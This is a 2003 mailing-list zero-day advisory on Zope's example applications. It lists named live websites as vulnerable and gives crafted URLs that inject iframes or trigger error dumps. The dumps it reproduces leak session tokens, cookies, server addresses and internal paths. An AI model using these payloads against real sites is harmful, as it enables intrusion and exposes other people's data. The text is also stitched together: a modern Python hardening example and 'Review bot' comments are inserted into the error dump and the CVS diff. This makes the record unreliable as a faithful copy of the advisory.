Message-ID: <Law11-OE47ORIsSqZWd0003acb5@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: Zope

-= 0day - Freedom of Voice - Freedom of Choice =-

------------------------------------------------------------------
          - EXPL-A-2003-009 exploitlabs.com Advisory 009
------------------------------------------------------------------
                   -=- The DoPe on zOpE -=-



Donnie Werner
June 19, 2003
http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt


Product:
--------
Zope -=- open source application server
http://www.zope.com/


Vulnerabilities:
================

1  - Empty Upload ( physical location dump ) -=- /Examples/FileLibrary/addFile
2  - Html / js injection -=- /Examples/db/
3  - Blank Query -=- /Examples/ShoppingCart
3a - iframe Query ( Html/js injection ) -=- /Examples/ShoppingCart/addItems
3b - Unchecked Input Length -=- /Examples/ShoppingCart/addItems
3c - Unchecked Characters -=- /Examples/ShoppingCart/addItems

Remote:
-------
yup


not vulnerable to #1 ( blank upload )
-------------------------------------
examples:

http://www.aixtraware.de/TCPware/Examples
Server: Zope/(Zope 2.6.1 (binary release, python 2.1, linux2-x86),
python 2.1.3, linux2) ZServer/1.1b1

http://ispg.csu.edu.au
Server: Zope/(Zope 2.5.1 (source release, python 2.1, linux2), python
2.1.3, freebsd4) ZServer/1.1b1

http://www.jungle2.org
Server: Zope/(Zope 2.5.1 (OpenBSD package zope-2.5.1p1), python 2.1.3,
openbsd3) ZServer/1.1b1


vulnerable
----------
Example URLs - #1:


http://klever.multimedia.fh-augsburg.de
Server: Zope/(Zope 2.6.1 (source release, python 2.1, linux2), python
2.1.3, linux2) ZServer/1.1b1

http://grlug.org/
Apache/1.3.27 (Unix)  (Red-Hat/Linux) mod_fastcgi/2.2.12
mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.2 PHP/4.1.2 mod_perl/1.26

http://grlug.org/zope/Examples/FileLibrary/addFile


Error...

Zope has encountered an error while publishing this resource.

Error Type: Bad Request
Error Value: Empty or invalid id specified.

Troubleshooting Suggestions

The URL may be incorrect.
The parameters passed to this resource may be incorrect.
A resource that this resource relies on may be encountering an error.
For more detailed information about the error, please refer to the
HTML source for this page.

If the error persists please contact the site maintainer. Thank you
for your patience.


Traceback (innermost last):
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 150,
in publish_module
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 114,
in publish
  File /usr/local/src/zope/lib/python/Zope/__init__.py, line 159, in
zpublisher_exception_hook
    (Object: FileLibrary)
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 98,
in publish
  File /usr/local/src/zope/lib/python/ZPublisher/mapply.py, line 88,
in mapply
    (Object: addFile)
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 39,
in call_object
    (Object: addFile)
  File /usr/local/src/zope/lib/python/Shared/DC/Scripts/Bindings.py,
line 252, in __call__
    (Object: addFile)
  File /usr/local/src/zope/lib/python/Shared/DC/Scripts/Bindings.py,
line 283, in _bindAndExec
    (Object: addFile)
  File
/usr/local/src/zope/lib/python/Products/PythonScripts/PythonScript.py,
line 302, in _exec
    (Object: addFile)
    (Info: ({'script': <PythonScript instance at 8c23a90>, 'context':
<Folder instance at 89548e0>, 'container': <Folder instance at
89548e0>, 'traverse_subpath': []}, (<ZPublisher.HTTPRequest.FileUpload
instance at 0x8b2eba4>,), {}, None))
  File Script (Python), line 7, in addFile
  File /usr/local/src/zope/lib/python/OFS/Image.py, line 52, in
manage_addFile
    (Object: Files)
  File /usr/local/src/zope/lib/python/OFS/ObjectManager.py, line 236,
in _setObject
    (Object: Files)
  File /usr/local/src/zope/lib/python/OFS/ObjectManager.py, line 53,
in checkValidId
    (Object: Files)
Bad Request: (see above)



Example-1.2:

http://www.pitch.com
Server: Apache/1.3.27 (Unix)  (Red-Hat/Linux) mod_fastcgi/2.2.12

/Examples/FileLibrary/addFile


Site Error
An error was encountered while publishing this resource.

Error Type: Bad Request
Error Value: Empty or invalid id specified.
Traceback

  Traceback (innermost last):
  File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 98, in
publish
  File /usr/local/zope/lib/python/ZPublisher/mapply.py, line 88, in
mapply
    (Object: addFile)
  File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 39, in
call_object
    (Object: addFile)
  File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line
252, in __call__
    (Object: addFile)
  File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line
283, in _bindAndExec
    (Object: addFile)
  File
/usr/local/zope/lib/python/Products/PythonScripts/PythonScript.py,
line 291, in _exec
    (Object: addFile)
    (Info: ({'script': , 'context': , 'container': ,
'traverse_subpath': []}, (,), {}, None))
  File Script (Python), line 7, in addFile
  File /usr/local/zope/lib/python/OFS/Image.py, line 52, in
manage_addFile
    (Object: Files)
  File /usr/local/zope/lib/python/OFS/ObjectManager.py, line 219, in
_setObject
    (Object: Files)
  File /usr/local/zope/lib/python/OFS/ObjectManager.py, line 53, in
checkValidId
    (Object: Files)
Bad Request: Empty or invalid id specified.

======================================================================
======================================================================




Example-2.1:

http://www.c-media.com.au/Examples/db/ExampledbBrowseReport
http://198.78.66.174:8080/Examples/


exploit:
--------
edit the "description" field for html / js injection

<iframe src=http://somesite.com</iframe>

viewing of the existing database is rendered useless


======================================================================
======================================================================



Example-3:

http://www.sfweekly.com/Examples/ShoppingCart


enter a blank as a quantity entry

http://www.sfweekly.com/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=&orders.id%3Arecords=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0

Site Error
An error was encountered while publishing this resource.

Error Type: ValueError
Error Value: invalid literal for int():

Traceback

  Traceback (innermost last):
  File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 98, in
publish
  File /usr/local/zope/lib/python/ZPublisher/mapply.py, line 88, in
mapply
    (Object: addItems)
  File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 39, in
call_object
    (Object: addItems)
  File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line
252, in __call__
    (Object: addItems)
  File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line
283, in _bindAndExec
    (Object: addItems)
  File
/usr/local/zope/lib/python/Products/PythonScripts/PythonScript.py,
line 291, in _exec
    (Object: addItems)
    (Info: ({'script': , 'context': , 'container': ,
'traverse_subpath': []}, ([id: '510-007', quantity: '', id: '510-122',
quantity: '0', id: '510-115', quantity: '0'], formorders [id:
'510-007', quantity: '', id: '510-122', quantity: '0', id: '510-115',
quantity: '0'] cookies_ZopeId '23329946A0z9drL5xZk' Apache
'12.230.1.165.260541049326654641' lazy itemsother_ZopeId
'23329946A0z9drL5xZk' orders [id: '510-007', quantity: '', id:
'510-122', quantity: '0', id: '510-115', quantity: '0'] Apache
'12.230.1.165.260541049326654641' SESSION id: 10531690730759726137,
token: 23329946A0z9drL5xZk, contents: [('items', {})] traverse_subpath
[] SERVER_URL 'http://www.sfweekly.com' VirtualRootPhysicalPath ('',
'san') PUBLISHED <PythonScript instance at 9e01660> URL
'http://www.sfweekly.com/Examples/ShoppingCart/addItems'
AUTHENTICATED_USER Anonymous User TraversalRequestNameStack []
AUTHENTICATION_PATH 'san/virtual_hosts' URL0
http://www.sfweekly.com/Examples/ShoppingCart/addItems URL1
http://www.sfweekly.com/Examples/ShoppingCart URL2
http://www.sfweekly.com/Examples URL3 http://www.sfweekly.com BASE0
http://www.sfweekly.com BASE1 http://www.sfweekly.com BASE2
http://www.sfweekly.com/Examples BASE3
http://www.sfweekly.com/Examples/ShoppingCart BASE4
http://www.sfweekly.com/Examples/ShoppingCart/addItems
environDOCUMENT_ROOT '/home/nti/htdocs/san' SERVER_ADDR
'63.241.135.221' HTTP_ACCEPT_ENCODING 'gzip, deflate' SCRIPT_FILENAME
'/home/httpd/fastcgi/slave3' GATEWAY_INTERFACE 'CGI/1.1' SERVER_PORT
'80' PATH_TRANSLATED
'/home/httpd/fastcgi/slave3/VirtualHostBase/http/www.sfweekly.com:80/s
an/VirtualHostRoot/VirtualHostBase/http/www.sfweekly.com:80/san/Virtua
lHostRoot/Examples/ShoppingCart/addItems' source 'slave3' UNIQUE_ID
'PsYVuD-xh80AAEv9Xno' HTTP_ACCEPT_LANGUAGE 'en-us' REMOTE_ADDR
'12.229.234.100' SERVER_NAME 'www.sfweekly.com' HTTP_CONNECTION
'Keep-Alive' HTTP_USER_AGENT 'Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; USER AGENT)' HTTP_ACCEPT 'image/gif, image/x-xbitmap,
image/jpeg, image/pjpeg, application/x-shockwave-flash, */*'
REQUEST_URI
'/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.qu
antity%3Arecords=&orders.id%3Arecords=510-122&orders.quantity%3Arecord
s=0&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0' PATH
'/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin' QUERY_STRING
'orders.id%3Arecords=510-007&orders.quantity%3Arecords=&orders.id%3Are
cords=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&
orders.quantity%3Arecords=0' SERVER_PROTOCOL 'HTTP/1.1' SCRIPT_URL
'/Examples/ShoppingCart/addItems' HTTP_HOST 'www.sfweekly.com'
REQUEST_METHOD 'GET' SERVER_SIGNATURE '' SCRIPT_URI
'http://www.sfweekly.com/Examples/ShoppingCart/addItems' SCRIPT_NAME
'' SITE 'san' SERVER_SOFTWARE 'Apache/1.3.27 (Unix) (Red-Hat/Linux)
mod_fastcgi/2.2.12' SERVER_ADMIN 'webadmin@...times.com' PATH_INFO
'/VirtualHostBase/http/www.sfweekly.com:80/san/VirtualHostRoot/Example
s/ShoppingCart/addItems' HTTP_COOKIE
'Apache=12.230.1.165.260541049326654641;
_ZopeId="23329946A0z9drL5xZk"' REMOTE_PORT '21891' HTTP_REFERER
'http://www.sfweekly.com/Examples/ShoppingCart/addItems?orders.id%3Are
cords=510-007&orders.quantity%3Arecords=0&orders.id%3Arecords=510-122&
orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&orders.quantit
y%3Arecords=0' ), {}, (None,)))
  File Script (Python), line 11, in addItems
ValueError: invalid literal for int():
----------------------------------------------------------------------
----------------------------------------------------------------------
orders [id: '510-007', quantity: '0', id: '510-122', quantity: '', id:
'510-115', quantity: '0']
orders [id: '510-007', quantity: '0', id: '510-122', quantity: 'test',
id: '510-115', quantity: '0']
----------------------------------------------------------------------
----------------------------------------------------------------------




example 3a:
-----------

This I love...

insert an iframe into the unchecked-length quantity field


<iframe src="http://ebay.com"></iframe>
<iframe src=http://ebay.com
<iframe src="http://ebay.com

http://www.jungle2.org/Examples/ShoppingCart
http://www.westword.com/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=0&orders.id%3Arecords=510-122&orders.quantity%3Arecords=%3Ciframe+src%3Dhttp%3A%2F%2Febay.com%3C%2Fiframe%3E&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0


<iframe src=http://ebay.com

GET
/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.qua
ntity%3Arecords=%3Ciframe+src%3Dhttp%3A%2F%2Febay.com&orders.id%3Areco
rds=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&or
ders.quantity%3Arecords=0

HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*
Referer: http://www.westword.com/Examples/ShoppingCart/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; USER
AGENT)
Host: www.westword.com
Cookie: Apache=12.229.228.51.196431047271232157;
_ZopeId="50159375A0z9pTTmVlU"


Post-injection URL analysis:
----------------------------

The injected value puts this URL in a second frame before the main
ebay.com frame; the original record info is appended to the external
URL reference, resulting in 2 iframes, as evidenced by:

<iframe src=http://ebay.com/


http://ebay.com/',

http://ebay.com',%20id:%20'510-122',%20quantity:%20'0',%20id:%20'510-115',%20quantity:%20'0'],%20<h3>form</h3><table><tr%20valign=


<iframe src=http://ebay.com

http://ebay.com',/
http://ebay.com/


<iframe src="http://ebay.com"></iframe>
http://ebay.com/


Example 3b - 3c:
---------------- 

Sending any string longer than 11 characters in the quantity field
causes a dump.


details here...

http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=123456789101112131415&orders.id%3Arecords=510-122&orders.quantity%3Arecords=+%3Ctd%3ENeed+to+go+out+of+town+for+a+few+days%2C+and+no+one+can+feed+your+pigeons%3F+Don%27t+worry%2C+we+now+have+the+virtually+spillproof+hopper+feeder.+Made+from+birch+plywood+it+holds+from+30+to+35+pounds+of+grain.+Pigeons+can+get+at+the+feed+through+holes+in+the+plexiglass+cover%2C+but+will+not+be+able+to+kick+out+any+feed.%3C%2Ftd%3E&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0

revealing these items:

SESSION id: 10546821410043251757, token: 40684361A01gE7Hjjvc,
contents: []

SERVER_URL 'http://www.sfweekly.com' VirtualRootPhysicalPath ('',
'san')
PUBLISHED <PythonScript instance at 96c4040>
URL 'http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems'
AUTHENTICATED_USER Anonymous User TraversalRequestNameStack []
AUTHENTICATION_PATH 'san/virtual_hosts'
URL0 http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems
URL1 http://www.sfweekly.com/calendar/Examples/ShoppingCart
URL2 http://www.sfweekly.com/calendar/Examples
URL3 http://www.sfweekly.com/calendar
URL4 http://www.sfweekly.com
BASE0 http://www.sfweekly.com
BASE1 http://www.sfweekly.com
BASE2 http://www.sfweekly.com/calendar
BASE3 http://www.sfweekly.com/calendar/Examples
BASE4 http://www.sfweekly.com/calendar/Examples/ShoppingCart
BASE5 http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems
environ
DOCUMENT_ROOT '/home/nti/htdocs/san'
SERVER_ADDR '63.241.135.221'
HTTP_ACCEPT_ENCODING 'gzip, deflate'
SCRIPT_FILENAME '/home/httpd/fastcgi/slave2'
GATEWAY_INTERFACE 'CGI/1.1'
SERVER_PORT '80'
PATH_TRANSLATED
'/home/httpd/fastcgi/slave3/VirtualHostBase/http/www.sfweekly.com:80/s
an/VirtualHostRoot/VirtualHostBase/http/www.sfweekly.com:80/san/Virtua
lHostRoot/calendar/Examples/ShoppingCart/addItems'
source 'slave2'
UNIQUE_ID 'Pt02bz-xh80AAC79HHU'
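As an added example (mine, not code from the advisory or from Zope), the addItems pattern behind Examples 3 through 3c reconstructed in Python 3: a stand-in for the `:records` form marshalling seen in the query strings above, the unchecked `int()` conversion that produces the ValueError page, and a hardened version that validates shape and length, fails closed without a traceback, and escapes anything it echoes (which is also the fix for the Example 2 description-field injection). The record parser, the id/quantity regexes and the length cap are my assumptions, not Zope's.

```python
import html
import re
from urllib.parse import parse_qsl

# Constructed sample: the Example-3 query string with the blank quantity.
SAMPLE_QUERY = ("orders.id%3Arecords=510-007&orders.quantity%3Arecords="
                "&orders.id%3Arecords=510-122&orders.quantity%3Arecords=0"
                "&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0")

def parse_records(query, prefix="orders"):
    """Stand-in for Zope's ':records' marshalling (my reading, not Zope's code):
    <prefix>.<key>:records fields are grouped into dicts; a repeated key starts
    a new record."""
    records, current = [], {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not name.endswith(":records"):
            continue
        field, _, key = name[:-len(":records")].partition(".")
        if field != prefix:
            continue
        if key in current:          # repeated key => next record begins
            records.append(current)
            current = {}
        current[key] = value
    if current:
        records.append(current)
    return records

def add_items_unsafe(records):
    """The pattern the advisory trips over: int() on the raw field, so a blank
    or '<iframe ...' quantity raises ValueError and the default error page
    echoes the request (cookies, session token, environ) back to the client."""
    cart = {}
    for rec in records:
        cart[rec["id"]] = cart.get(rec["id"], 0) + int(rec["quantity"])
    return cart

ID_RE = re.compile(r"^[0-9]{3}-[0-9]{3}$")  # assumption: shape of the sample ids
QTY_RE = re.compile(r"^[0-9]{1,6}$")        # assumption: realistic length cap
def add_items(records):
    """Hardened: check shape and length before int(), never raise on bad input,
    and report a generic reason rather than echoing the offending value."""
    cart, errors = {}, []
    for rec in records:
        item_id, qty = rec.get("id", ""), rec.get("quantity", "")
        if not ID_RE.match(item_id):
            errors.append("rejected a record with a malformed item id")
        elif not QTY_RE.match(qty):
            errors.append("rejected %s: quantity must be 1-6 digits" % item_id)
        elif int(qty) > 0:
            cart[item_id] = cart.get(item_id, 0) + int(qty)
    return cart, errors

def render_rows(records):
    """Escape every echoed value: the fix for the Example 2 and 3a injections."""
    return "".join("<tr><td>%s</td><td>%s</td></tr>" % (html.escape(r.get("id", "")),
                   html.escape(r.get("quantity", ""))) for r in records)
```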



===================================================================
extra notes
===================================================================
Update of
/cvs-repository/Releases/Zope/lib/python/Products/PythonScripts
In directory cvs.zope.org:/tmp/cvs-serv29374/Products/PythonScripts

Modified Files:
 Utility.py module_access_examples.py
Log Message:
Merge evan-modsec_fix-branch


=== Releases/Zope/lib/python/Products/PythonScripts/Utility.py 1.4 =>
1.5 ===
 __version__='$Revision$'[11:-2]

-from AccessControl import ModuleSecurityInfo, ClassSecurityInfo
-from Globals import InitializeClass
-import string
-
-def allow_module(module_name):
-    """Allow a module and all its contents to be used from a
-    restricted Script. The argument module_name may be a simple
-    or dotted module or package name. Note that if a package
-    path is given, all modules in the path will be available."""
-    ModuleSecurityInfo(module_name).setDefaultAccess(1)
-    dot = string.find(module_name, '.')
-    while dot > 0:
-        ModuleSecurityInfo(module_name[:dot]).setDefaultAccess(1)
-        dot = string.find(module_name, '.', dot + 1)
-
-def allow_class(Class):
-    """Allow a class and all of its methods to be used from a
-    restricted Script.  The argument Class must be a class."""
-    Class._security = sec = ClassSecurityInfo()
-    sec.declareObjectPublic()
-    sec.setDefaultAccess(1)
-    sec.apply(Class)
-    InitializeClass(Class)
+# These have been relocated, and should be imported from
AccessControl

+from AccessControl import allow_module, allow_class
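Review bot: the re-export `from AccessControl import allow_module, allow_class` keeps existing `Products.PythonScripts.Utility` imports working, but the removed `allow_module` body (the `string.find` loop that calls `setDefaultAccess(1)` on every parent package of a dotted name) is security-relevant and this hunk does not show the relocated implementation; confirm that the AccessControl version preserves exactly that behaviour and its docstring warning that "all modules in the path will be available", since widening or narrowing what a restricted Script may import changes the sandbox. The `+# These have been relocated, and should be imported from` comment should also state that the names are kept here only for backward compatibility, so callers know to migrate.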


===
Releases/Zope/lib/python/Products/PythonScripts/module_access_examples
.py 1.1 => 1.2 ===
 '''

-from Products.PythonScripts.Utility import allow_module, allow_class
+from AccessControl import allow_module, allow_class, allow_type
 from AccessControl import ModuleSecurityInfo, ClassSecurityInfo
 from Globals import InitializeClass
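Review bot: `allow_type` is added on the `+from AccessControl import allow_module, allow_class, allow_type` line, but in the visible examples it is used only inside commented-out lines further down; since this file exists to show product authors how to open modules to restricted Scripts, add a one-line comment next to the import saying what `allow_type` is for, by analogy with `allow_class`, and that it is a new entry point in this release.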

@@ -42,9 +42,9 @@
 # ModuleSecurityInfo('re').declarePublic('compile', 'findall',
 #   'match', 'search', 'split', 'sub', 'subn', 'error',
 #   'I', 'L', 'M', 'S', 'X')
-# from re import RegexObject, MatchObject
-# allow_class(RegexObject)
-# allow_class(MatchObject)
+# import re
+# allow_type(type(re.compile('')))
+# allow_type(type(re.match('x','x')))

 # ModuleSecurityInfo('StringIO').declarePublic('StringIO'
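Review bot: the replacement example obtains the regex and match types via `type(re.compile(''))` and `type(re.match('x','x'))` instead of the removed `from re import RegexObject, MatchObject`; a short comment explaining why (presumably those names are not importable from `re`, so the old example could not have run as written) and noting that the `re.match('x','x')` call exists only to obtain the match type would help readers copying the example. Since the block is still commented out, nothing here executes; consider also stating that opening these types via `allow_type` exposes every method on them to restricted code, to match the explicit method list in the `declarePublic` call above it.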





Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
info@...e.com - Concurrent with this advisory


Credits:
--------

Donnie Werner
http://exploitlabs.com "finding your holes"
morning_wood@...me4.com - get tested


-------------------------------------------------------------------------
be a good vendor... test your products first, it is your problem, fix
it.
http://nothackers.org - it's t0day
-------------------------------------------------------------------------

_______________________________________________
0day mailing list
0day@...hackers.org
http://nothackers.org/mailman/listinfo/0day
